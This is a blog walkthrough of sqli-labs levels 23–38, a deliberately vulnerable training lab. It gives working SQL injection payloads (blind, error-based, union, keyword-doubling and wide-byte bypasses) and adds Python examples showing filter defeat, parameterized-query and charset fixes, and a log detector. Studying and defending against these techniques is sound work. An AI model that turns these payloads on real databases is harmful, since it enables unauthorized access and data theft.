sqli_labs walkthrough notes (part 2)
[TOC]
Page-2 (Adv Injections)
less-23
time-based blind:
```
payload:
```
less-24
Second-order injection
less-25
```
```
less-25a
boolean-based blind
```
?id=1 anandd ascii(mid((select flag from ctftraining.flag),1,1))>103 %23
```
time-based blind
```
?id=1 anandd if(length(database())>1,sleep(3),1) %23
```
less-26
Error-based injection. This is the same problem I have done before: spaces are filtered, so parentheses take their place, and `or`/`and` are bypassed by writing them doubled.
```
?id=1'^updatexml(1,concat(0x7e,(select(right(flag,30))from(ctftraining.flag)),0x7e),1)^'1'='1
```
less-26a
Boolean-based blind; the filtering is the same as in less-26.
```
id=1'^ascii(mid((select(flag)from(ctftraining.flag)),1,1))>102^'1'='1
```
less-27
Spaces, comment markers, `union` and `select` are filtered; bypassed with mixed case.
```
?id=0'%0aunIon%0aselEct%0a1,database(),3%0aor%0a'1'='1
```
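The bypasses in less-26 through less-27 all target the same weakness: a blacklist that strips each keyword in a single pass, so a doubled keyword collapses back into the original. The example below is added here and is not the lab's own PHP; `naive_filter` is an assumed reconstruction of that kind of filter, and the `users` table is a constructed sqlite3 fixture. It shows the filter being defeated and the parameterized query that makes the blacklist unnecessary.

```python
import re
import sqlite3

# Assumed model of a single-pass blacklist filter (not the lab's actual code):
# every listed token is removed once, in one left-to-right scan.
BLACKLIST = ["union", "select", "and", "or"]


def naive_filter(value: str) -> str:
    """Strip blacklisted keywords in a single pass; 'anandd' collapses to 'and'."""
    for word in BLACKLIST:
        value = re.sub(re.escape(word), "", value, flags=re.IGNORECASE)
    return value


def make_db() -> sqlite3.Connection:
    """Constructed in-memory fixture with two users."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id TEXT, username TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", [("1", "alice"), ("2", "bob")])
    return conn


def lookup_unsafe(conn: sqlite3.Connection, user_id: str) -> list:
    """Vulnerable pattern: blacklist filter plus string concatenation."""
    sql = f"SELECT username FROM users WHERE id='{naive_filter(user_id)}'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn: sqlite3.Connection, user_id: str) -> list:
    """Hardened pattern: the value is bound as a parameter and never parsed as SQL."""
    return conn.execute("SELECT username FROM users WHERE id=?", (user_id,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    probe = "999' oorr '1'='1"          # doubled keyword, as in the less-26 payloads
    print(naive_filter(probe))           # the filter hands back a clean 'or'
    print(lookup_unsafe(db, probe))      # returns every row: the literal was closed
    print(lookup_safe(db, probe))        # returns nothing: no user has that id string
```

The safe variant needs no keyword list at all: because the driver sends the value separately from the statement, a quote or keyword in the input is compared against the `id` column rather than interpreted.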
less-27a
```
```
less-28
Boolean-based blind
```
?id=0'||ascii(mid((selECt%0aflag%0afrom%0actftraining.flag),1,1))>102^'1'='0
```
union select
```
?id=0%27)%0aunion%0aall%0aselect%0a1,(select%0aflag%0afrom%0actftraining.flag%0a%0alimit%0a0,1),3%0aor%0a(%271%27=%270
```
less-28a
Boolean-based blind
```
?id=0'^ ascii(mid((select group_concat(flag) from ctftraining.flag),1,1))>102 or '1'='0
```
less-29
time-based blind
```
?id=1%27%20and%20(select(sleep(2-if(ord(mid((select flag from ctftraining.flag),1,1))>102,0,2))))%20and%20%271%27=%271
```
less-30
Boolean-based blind
```
?id=1"and ord(mid((select flag from ctftraining.flag),1,1))>101 and "1"="1
```
less-31
```
?id=1")and ord(mid((select flag from ctftraining.flag),1,1))>101 and ("1"="1
```
less-32
Wide-byte injection:
```
?id=-1%df%27 union select 1,user(),3 -- +
```
less-33
Wide byte:
```
?id=-1%df%27 union select 1,database(),3 -- +
```
less-34
Wide byte:
```
uname=admin%df' union select 1,(select flag from ctftraining.flag)%23&passwd=123&submit=Submit
```
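The `%df%27` trick in less-32 through less-34 works because the escaping step and the database disagree about the character set: a byte-oriented escaper inserts `\` (0x5C) before the quote, but when the result is decoded as GBK the lead byte 0xDF swallows 0x5C as its trail byte and the quote is left bare. The example below is added here and is not the lab's code; `escape_quotes` is an assumed model of `addslashes()`-style escaping, and the input bytes are constructed. It checks whether a bare quote survives under a given connection charset, which is the check a reviewer would run before trusting escape-based defenses.

```python
def escape_quotes(data: bytes) -> bytes:
    """Assumed model of addslashes()-style escaping: a backslash before ' " and \\ (byte-wise)."""
    out = bytearray()
    for b in data:
        if b in b"'\"\\":
            out.append(0x5C)
        out.append(b)
    return bytes(out)


def quote_survives(raw: bytes, charset: str) -> bool:
    """Escape `raw`, decode it the way a server using `charset` would, and report
    whether a single quote remains that is not preceded by a backslash."""
    text = escape_quotes(raw).decode(charset, errors="replace")
    for i, ch in enumerate(text):
        if ch == "'" and (i == 0 or text[i - 1] != "\\"):
            return True
    return False


def report(raw: bytes) -> dict:
    """Compare the same escaped bytes under a multibyte charset and under UTF-8."""
    return {cs: quote_survives(raw, cs) for cs in ("gbk", "utf-8")}


if __name__ == "__main__":
    probe = b"\xdf'"          # constructed: the bytes behind %df%27
    print(report(probe))      # {'gbk': True, 'utf-8': False}
    print(report(b"plain'"))  # {'gbk': False, 'utf-8': False}
```

Under `gbk` the pair 0xDF 0x5C decodes as one two-byte character and the quote closes the literal; under `utf-8` the lone 0xDF is just an invalid byte and the backslash still protects the quote. The fix is to make the escaper and the server agree on the charset (in PHP, `mysqli_set_charset()` rather than a `SET NAMES` query) or, better, to bind values as prepared-statement parameters so no escaping is needed.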
less-35
```
?id=-1 union select 1,database(),3 -- +
```
less-36
Same as less-33.
less-37
Same.
less-38
Same.
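Seen from the other side, the payloads in these levels fall into a few recognisable shapes: `sleep()`/`benchmark()` for time-based blind, `updatexml()`/`extractvalue()` for error-based, `ascii(mid(...))`/`ord(mid(...))` for boolean blind, `union ... select` with `%0a` standing in for spaces, doubled keywords, and a high byte directly before a quote. The detector below is added here, is not part of the original post, and runs over constructed Apache-style log lines that reuse the requests shown above; rule names and the `REQ` regex are my own.

```python
import re
from urllib.parse import unquote_to_bytes

# Request path out of an Apache combined-format line (assumed layout).
REQ = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

# Detection rules, each named after the injection shape it flags.
RULES = {
    "time_based": re.compile(r"\b(sleep|benchmark)\s*\("),
    "error_based": re.compile(r"\b(updatexml|extractvalue)\s*\("),
    "boolean_blind": re.compile(r"\b(ascii|ord)\s*\(\s*(mid|substr|substring)\s*\("),
    "union_select": re.compile(r"union[\s(]+(?:all[\s(]+)?select\b"),
    "doubled_keyword": re.compile(r"\b(anandd|oorr|selselectect|ununionion)\b"),
    "wide_byte_quote": re.compile(r"[\x81-\xfe]'"),  # high byte immediately before a quote
}


def classify_request(path: str) -> set:
    """URL-decode the path, fold case and whitespace, and return the rule names that match."""
    decoded = unquote_to_bytes(path).decode("latin-1").lower()  # latin-1 keeps every byte as one char
    decoded = re.sub(r"[\s+]+", " ", decoded)                    # %0a, %09 and '+' all become spaces
    return {name for name, rx in RULES.items() if rx.search(decoded)}


def scan_log(lines) -> list:
    """Return (path, sorted tags) for every request that triggers at least one rule."""
    findings = []
    for line in lines:
        m = REQ.search(line)
        if m:
            tags = classify_request(m.group(1))
            if tags:
                findings.append((m.group(1), sorted(tags)))
    return findings


# Constructed sample log: four requests copied from the levels above plus one benign request.
SAMPLE_LOG = r"""
127.0.0.1 - - [03/Aug/2020:10:00:00 +0000] "GET /Less-1/?id=1 HTTP/1.1" 200 512
127.0.0.1 - - [03/Aug/2020:10:00:01 +0000] "GET /Less-26/?id=1'^updatexml(1,concat(0x7e,(select(right(flag,30))from(ctftraining.flag)),0x7e),1)^'1'='1 HTTP/1.1" 200 512
127.0.0.1 - - [03/Aug/2020:10:00:02 +0000] "GET /Less-28/?id=0'||ascii(mid((selECt%0aflag%0afrom%0actftraining.flag),1,1))>102^'1'='0 HTTP/1.1" 200 512
127.0.0.1 - - [03/Aug/2020:10:00:03 +0000] "GET /Less-29/?id=1%27%20and%20(select(sleep(2-if(ord(mid((select%20flag%20from%20ctftraining.flag),1,1))>102,0,2))))%20and%20%271%27=%271 HTTP/1.1" 200 512
127.0.0.1 - - [03/Aug/2020:10:00:04 +0000] "GET /Less-32/?id=-1%df%27%20union%20select%201,user(),3%20--%20+ HTTP/1.1" 200 512
""".strip().splitlines()


if __name__ == "__main__":
    for path, tags in scan_log(SAMPLE_LOG):
        print(tags, path)
```

Decoding before matching matters: the `%0a` and case tricks that defeat the lab's string filters are exactly what a rule applied to the raw log line would miss, and the latin-1 decode lets the wide-byte rule see the 0xDF byte instead of a decode error.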
Summary
Dozens of levels are all alike and not very nourishing: once you know a handful of payloads you can reuse them throughout and learn nothing new. Grinding through them wore me out; I'll rest for a while before doing the later ones.
- Post Title: sqli_labs通关记录(二)
- Post Author: Katharsis
- Post Link: http://yoursite.com/2020/08/03/sqli-labs-2/
- Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.